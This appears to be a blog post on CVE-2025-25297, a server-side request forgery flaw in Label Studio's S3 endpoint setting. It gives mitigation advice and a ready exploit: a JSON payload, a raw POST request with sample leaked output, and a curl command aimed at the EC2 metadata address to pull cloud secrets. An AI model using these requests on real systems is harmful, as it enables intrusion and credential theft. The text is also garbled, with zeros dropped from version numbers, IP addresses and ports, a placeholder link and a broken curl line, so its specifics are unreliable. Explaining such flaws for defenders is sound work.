Label Studio is a popular open source data annotation tool used across industries for processing machine learning datasets. In early 2025, a severe vulnerability was found in its S3 storage integration that allowed external attackers to access internal resources via a classic Server-Side Request Forgery (SSRF) technique. This post breaks down CVE-2025-25297: what it means, how it works, and how attackers could exploit it—including code snippets and mitigation advice.
TL;DR: What Happened?
- Label Studio, before version 1.16., lets users define a custom S3 endpoint (via the s3_endpoint parameter) with *no* validation.
The software blindly hands the endpoint to boto3, the AWS Python SDK.
- This allows attackers to make requests to any HTTP service the server can reach, including *internal* services—bypassing normal network rules.
- If the request fails, Label Studio even returns detailed error messages with response bodies, which can leak sensitive information.
- The issue is patched in Label Studio 1.16.. Official advisory here. *(Example URL—replace with the real one when available.)*
How SSRF Works in Label Studio
Label Studio’s S3 integration is designed to connect to a _cloud storage_ system, like Amazon S3, for managing assets. But, it lets you specify *any* endpoint—not just a valid S3 service. Here’s the typical workflow and the dangerous twist:
No blocking of protocols or target domains:
It does not check if the URL is safe, if it's HTTP instead of HTTPS, if it's 127...1, or a localhost address.
Requests are made to attacker-controlled or internal destinations:
When you sync data, Label Studio’s server tries to use the endpoint, exposing whatever services are addressable from the server. Failed requests produce detailed error messages.
Imagine the underlying Python code in Label Studio (simplified for clarity)
import boto3
def create_s3_connection(access_key, secret_key, s3_endpoint):
# s3_endpoint is user-controlled!
s3 = boto3.client(
's3',
aws_access_key_id=access_key,
aws_secret_access_key=secret_key,
endpoint_url=s3_endpoint
)
return s3
The issue: endpoint_url=s3_endpoint is fully trusted, so if a user sets this to http://localhost:808/internal-api, boto3 will try to access http://localhost:808/internal-api from the internal server’s network—even if that is an admin panel, metadata API, or something else sensitive.
Exploit Path: How an Attacker Abuses This Vulnerability
Let’s say, as an attacker, you have access (direct or via an XSS attack or leaked credentials) to create a new S3 storage source in a public or shared Label Studio instance.
`json
{
"s3_endpoint": "http://127...1:800/private-admin"
}
Read the error response:
If the local server responds (even with an error), Label Studio returns the full response body in the error message! If the internal service leaks secrets, keys, or system information, you get that data.
Request
POST /api/storages/s3/new
Content-Type: application/json
{
"title": "Attack Storage",
"bucket": "not-needed",
"s3_endpoint": "http://localhost:808/metadata";
}
Resulting error message
{
"detail": "Error from S3: <html><body><h1>Metadata Service</h1>...</body></html>"
}
No authentication required:
If the Label Studio instance is publicly accessible—or you are a lower-privilege user—you can exploit this with just API access.
Information leakage:
Error messages include response bodies, so attackers can extract juicy internal secrets from error text (think /etc/passwd, GCP metadata, Kubernetes admin endpoints).
You can use curl to simulate an attack (replace LABEL_STUDIO_URL and API_TOKEN)
curl -H "Authorization: Token API_TOKEN" \
-H "Content-Type: application/json" \
-d '{"bucket":"x","s3_endpoint":"http://169.254.169.254/latest/meta-data/","title":"SSRF"}'; \
https://LABEL_STUDIO_URL/api/storages/s3/new
If vulnerable:
The response will include info from *Amazon EC2 instance metadata service* (potential environment secrets).
References
- GitHub Security Advisory – Label Studio (Check for CVE-2025-25297 listing)
- Label Studio Release Notes 1.16.
- Boto3 Documentation – client()
- OWASP SSRF Cheat Sheet
Upgrade immediately to Label Studio 1.16. or later.
- Instances with sensitive network access should be firewalled, and avoid exposing admin interfaces publicly.
- Validate and restrict user-provided endpoints rigorously in *any* application that must interact with custom URLs.
- If you maintain a fork or plugin for Label Studio, check if you have similar exposure points in your code.
Conclusion
CVE-2025-25297 shines a light on the dangers of trusting user-supplied endpoints in cloud integrations. If you're running Label Studio, update now, review your logs, and always treat “custom endpoint” functionality as a high-value target in your threat model.
If you want tailored advice on securing your ML pipelines, or need help setting internal firewalls properly, drop a comment or contact security pros for an audit.
Stay safe!
*This post was written exclusively for educational and awareness purposes. Always test ethically and with permission.*
Timeline
Published on: 02/14/2025 20:15:36 UTC